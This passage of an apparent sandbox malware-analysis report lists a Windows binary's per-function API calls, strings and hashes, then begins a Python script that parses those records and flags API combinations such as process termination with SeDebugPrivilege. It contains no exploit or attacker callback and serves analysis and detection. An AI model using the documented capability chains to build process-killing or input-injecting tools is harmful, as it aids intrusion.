                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00131B10
                                                        • InternetCloseHandle.WININET(00000000), ref: 00131B57
                                                          • Part of subcall function 00132483: GetLastError.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 00132498
                                                          • Part of subcall function 00132483: SetEvent.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 001324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 9b20f37eb88adbca4d470cb3749fb45189633e1523d096978ba6c3efecc00b58
                                                        • Instruction ID: 8732f5e45d262ec30f0b16e2a54c6ab8532e99745727c1f16a7e05a782904114
                                                        • Opcode Fuzzy Hash: 9b20f37eb88adbca4d470cb3749fb45189633e1523d096978ba6c3efecc00b58
                                                        • Instruction Fuzzy Hash: BA4192B5501218BFEB119F50CC89FFBBBACEF09355F00412AF905AB251E7749E459BA0
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0014F910), ref: 00138D28
                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0014F910), ref: 00138D5C
                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00138ED6
                                                        • SysFreeString.OLEAUT32(?), ref: 00138F00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                        • String ID:
                                                        • API String ID: 560350794-0
                                                        • Opcode ID: 663a01d9cf2de68f6511ae0e388f0f934453ce872578855cde07352fbec3c042
                                                        • Instruction ID: b6dd07df1a2cd88e5fa7cdc3b64134a9b9e7d29360f071adc21873fb7cfbbfd3
                                                        • Opcode Fuzzy Hash: 663a01d9cf2de68f6511ae0e388f0f934453ce872578855cde07352fbec3c042
                                                        • Instruction Fuzzy Hash: 4CF10975A00209EFDF14DF94C888EAEB7B9FF45314F1484A8F905AB251DB71AE46CB90
                                                        APIs
                                                        • _memset.LIBCMT ref: 0013F6B5
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013F848
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0013F86C
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013F8AC
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0013F8CE
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0013FA4A
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0013FA7C
                                                        • CloseHandle.KERNEL32(?), ref: 0013FAAB
                                                        • CloseHandle.KERNEL32(?), ref: 0013FB22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 0edc0a7c231fcfa4356dd5ccebb257a7fe4b608a903e18f3a3786e74be2521ec
                                                        • Instruction ID: 16be991a321b73d57d59b711828a54310717863bac9a697c3a6cc5ed65a7ad65
                                                        • Opcode Fuzzy Hash: 0edc0a7c231fcfa4356dd5ccebb257a7fe4b608a903e18f3a3786e74be2521ec
                                                        • Instruction Fuzzy Hash: E3E19E316043419FCB14EF24C895BAABBE5BF85354F14856DF8999B3A2CB30EC46CB52
                                                        APIs
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00123697,?), ref: 0012468B
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00123697,?), ref: 001246A4
                                                          • Part of subcall function 00124A31: GetFileAttributesW.KERNEL32(?,0012370B), ref: 00124A32
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00124D40
                                                        • _wcscmp.LIBCMT ref: 00124D5A
                                                        • MoveFileW.KERNEL32(?,?), ref: 00124D75
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: b679b48d00495d821e7de4c1df7d578d34af56c889ba428925078205b824da9c
                                                        • Instruction ID: e8a278b2d75e7d6affba57f2bd6efb9ef11a9b60bc2664a89dcb475346e086fb
                                                        • Opcode Fuzzy Hash: b679b48d00495d821e7de4c1df7d578d34af56c889ba428925078205b824da9c
                                                        • Instruction Fuzzy Hash: AA5151B20083959BC725DBA4DC819DF73ECAF94350F00092EF289D3152EF75A599CB56
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001486FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: d4e631f7ff26d349d3aa528e190c1f30c22e9e1aee4eb01fc3eb035a21be8e6b
                                                        • Instruction ID: db6fcf4ed29b033da98664aaea0c8ca3109adea04bd569f7693d1d4f91501166
                                                        • Opcode Fuzzy Hash: d4e631f7ff26d349d3aa528e190c1f30c22e9e1aee4eb01fc3eb035a21be8e6b
                                                        • Instruction Fuzzy Hash: 3751C134500245BEEF249F28CC89FAD7BA5EB05764F614129F914E66F1CF72A980CB50
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FC2F7
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FC319
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FC331
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FC34F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FC370
                                                        • DestroyIcon.USER32(00000000), ref: 000FC37F
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FC39C
                                                        • DestroyIcon.USER32(?), ref: 000FC3AB
                                                          • Part of subcall function 0014A4AF: DeleteObject.GDI32(00000000), ref: 0014A4E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID:
                                                        • API String ID: 2819616528-0
                                                        • Opcode ID: a63b630ba89393e2e8ef967b711f3514f114cd96d2e95f55ff422ae43f83ce67
                                                        • Instruction ID: 7a1191c8fc553aa07d5fd43eb1ecc86ba5b65a25947300adda7e94c4829d7c88
                                                        • Opcode Fuzzy Hash: a63b630ba89393e2e8ef967b711f3514f114cd96d2e95f55ff422ae43f83ce67
                                                        • Instruction Fuzzy Hash: AF517974600609AFDB24DF64CC46FAE3BE5EB58350F10452CF90297AA0DB70AD90EB50
                                                        APIs
                                                          • Part of subcall function 0011A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0011A84C
                                                          • Part of subcall function 0011A82C: GetCurrentThreadId.KERNEL32 ref: 0011A853
                                                          • Part of subcall function 0011A82C: AttachThreadInput.USER32(00000000,?,00119683,?,00000001), ref: 0011A85A
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0011968E
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001196AB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001196AE
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 001196B7
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001196D5
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001196D8
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 001196E1
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001196F8
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001196FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: eb3b5b31cd7b5d35c346a37e82453b53aaafa212ad18ba1d1a421a879ede855d
                                                        • Instruction ID: bd83d1d369c4f8d7dac880110589ab4332160198fd1f528b429a3487197c6e11
                                                        • Opcode Fuzzy Hash: eb3b5b31cd7b5d35c346a37e82453b53aaafa212ad18ba1d1a421a879ede855d
                                                        • Instruction Fuzzy Hash: C011E1B5910218BEF6106F60DC89FAA3F6DEB4D751F110429F244AB1B0CAF26C91DAA4
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0011853C,00000B00,?,?), ref: 0011892A
                                                        • HeapAlloc.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 00118931
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0011853C,00000B00,?,?), ref: 00118946
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0011853C,00000B00,?,?), ref: 0011894E
                                                        • DuplicateHandle.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 00118951
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0011853C,00000B00,?,?), ref: 00118961
                                                        • GetCurrentProcess.KERNEL32(0011853C,00000000,?,0011853C,00000B00,?,?), ref: 00118969
                                                        • DuplicateHandle.KERNEL32(00000000,?,0011853C,00000B00,?,?), ref: 0011896C
                                                        • CreateThread.KERNEL32(00000000,00000000,00118992,00000000,00000000,00000000), ref: 00118986
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 7945cf2d140600d1af64fa814e16cd21c42b3102ef7319162f174a08e221bcce
                                                        • Instruction ID: 80b8fe9e1af524dd72c8db61b6ebf5a98538e93c8635eb59a6d7e0897e8a9191
                                                        • Opcode Fuzzy Hash: 7945cf2d140600d1af64fa814e16cd21c42b3102ef7319162f174a08e221bcce
                                                        • Instruction Fuzzy Hash: 7601BF79640308FFE710ABA5DC4DF673BACEB89B11F408425FA09DB6A1CA709841CB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 4edbb35535c25d6ae8763a077983423c3da2fc0f8c00123091680d71b2abd0a7
                                                        • Instruction ID: ff8c2e3b9bcee6eb8cf3360b31aacdf2e5215a45858e462c6170704e26fecb99
                                                        • Opcode Fuzzy Hash: 4edbb35535c25d6ae8763a077983423c3da2fc0f8c00123091680d71b2abd0a7
                                                        • Instruction Fuzzy Hash: 74C1B271A0021A9FDF14DFA8D885EEEB7F5FF48314F158469E905AB281E7B0AD41CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: d7ef37c4e044ba54bb21a773e22960ad82f16f68e6bd8fcd6bcb4aa6f030ce9b
                                                        • Instruction ID: 8e62da8c086d5bafe9e24fb182254df70251b9f05e718013ee4cd6a21d5b4ce2
                                                        • Opcode Fuzzy Hash: d7ef37c4e044ba54bb21a773e22960ad82f16f68e6bd8fcd6bcb4aa6f030ce9b
                                                        • Instruction Fuzzy Hash: 23918C71A00219ABDF24DFA5C848FAFBBB8FF45710F108159F915AB291DBB09945CFA0
                                                        APIs
                                                          • Part of subcall function 0011710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?,?,00117455), ref: 00117127
                                                          • Part of subcall function 0011710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117142
                                                          • Part of subcall function 0011710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?,?), ref: 00117150
                                                          • Part of subcall function 0011710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00117044,80070057,?), ref: 00117160
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00139806
                                                        • _memset.LIBCMT ref: 00139813
                                                        • _memset.LIBCMT ref: 00139956
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00139982
                                                        • CoTaskMemFree.OLE32(?), ref: 0013998D
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 001399DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 0b393a6daf9794e1e95845b7026ca4e84f657fb06291db02abc59aca81990eae
                                                        • Instruction ID: 6326c09ebb56c92a9208354bcfe9bf6f66433c05139e234346602afe202d6db9
                                                        • Opcode Fuzzy Hash: 0b393a6daf9794e1e95845b7026ca4e84f657fb06291db02abc59aca81990eae
                                                        • Instruction Fuzzy Hash: AD913871D00229EBDB10DFA5DC45EDEBBB9EF08310F20416AF519A7291DB71AA44CFA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00146E24
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00146E38
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00146E52
                                                        • _wcscat.LIBCMT ref: 00146EAD
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00146EC4
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00146EF2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: ebaa709e4df17757a1047dd700de451a7ed6da3b10f5cd117ff60bd7cd6287d4
                                                        • Instruction ID: c3001c248038f9e06d88924815753be9c284482a1d9995cff1323a767189a751
                                                        • Opcode Fuzzy Hash: ebaa709e4df17757a1047dd700de451a7ed6da3b10f5cd117ff60bd7cd6287d4
                                                        • Instruction Fuzzy Hash: 9E418F74A00348EBEB21DFA4CC85BEA77E9EF09354F10442AF588A72A1D7719D858B60
                                                        APIs
                                                          • Part of subcall function 00123C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00123C7A
                                                          • Part of subcall function 00123C55: Process32FirstW.KERNEL32(00000000,?), ref: 00123C88
                                                          • Part of subcall function 00123C55: CloseHandle.KERNEL32(00000000), ref: 00123D52
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013E9A4
                                                        • GetLastError.KERNEL32 ref: 0013E9B7
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013E9E6
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0013EA63
                                                        • GetLastError.KERNEL32(00000000), ref: 0013EA6E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0013EAA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: c672695387feef9f818d14ab978015fe2e4f8050c52786e4b6c5aaf096620421
                                                        • Instruction ID: 9cdd5b7e88754bab2216140a84b05eccd11360199d5c81ddeafef4f162062c05
                                                        • Opcode Fuzzy Hash: c672695387feef9f818d14ab978015fe2e4f8050c52786e4b6c5aaf096620421
                                                        • Instruction Fuzzy Hash: 384186312003019FDB18EF24C895FAEBBE6AF51714F08842DF9069B3D2CB75A849CB95
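The per-function records on this page follow a regular text layout (an APIs list, the Strings and Memory Dump Source sections, then the Similarity block with its `$`-joined String ID), which makes them easy to triage mechanically instead of scrolling. The Python below is an added example written for this page, not Joe Sandbox code: it parses records of that shape into API sequences and referenced strings, keeps track of which calls come from "Part of subcall function" lines (those run in a callee, not in the function itself, so a hit on them is attributed differently), and flags API combinations a practitioner would check first, such as the Toolhelp32 snapshot / OpenProcess / TerminateProcess chain next to the SeDebugPrivilege string in the record above. The SAMPLE input is trimmed from two of the records on this page; the rule names in RULES are labels chosen for this example.

```python
"""Parse Joe Sandbox per-function records (the APIs / Strings / Similarity
blocks shown on this page) and flag API combinations worth a closer look.

Added example for this page; it is not Joe Sandbox code. SAMPLE is trimmed
from two of the records above so the script runs offline. The rule names in
RULES are labels chosen for this example."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function XXXX:" prefix (the call is
# made by a callee, not by this function), then Name.MODULE(args), ref: addr.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@$:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed input: trimmed from two records on this page.
SAMPLE = """\
APIs
  • Part of subcall function 00123C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00123C7A
  • Part of subcall function 00123C55: Process32FirstW.KERNEL32(00000000,?), ref: 00123C88
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013E9A4
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0013EA63
• CloseHandle.KERNEL32(00000000), ref: 0013EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: c672695387feef9f818d14ab978015fe2e4f8050c52786e4b6c5aaf096620421
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00123033
Strings
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 939e1059505d29e1bf5b08e3f2ea7478a81d85cb77190d19ef5fe0339b6f4d9c
"""


@dataclass
class FunctionRecord:
    apis: list[tuple[str, str, bool, str]] = field(default_factory=list)  # (api, module, via_subcall, ref)
    strings: list[str] = field(default_factory=list)
    opcode_id: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the report text into records; each record starts at an 'APIs' header."""
    records: list[FunctionRecord] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            section = "APIs"
            continue
        if line in SECTIONS:
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                cur.apis.append((m["api"], m["module"], bool(m["sub"]), m["ref"]))
        elif section == "Similarity":
            if line.startswith("• String ID:"):
                # Joe Sandbox joins the function's referenced strings with '$'.
                cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
            elif line.startswith("• Opcode ID:"):
                cur.opcode_id = line.split(":", 1)[1].strip()
    return records


# label -> (APIs that must all appear, strings that must all appear); labels are this example's own
RULES: dict[str, tuple[set[str], set[str]]] = {
    "process-termination": ({"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"}, {"SeDebugPrivilege"}),
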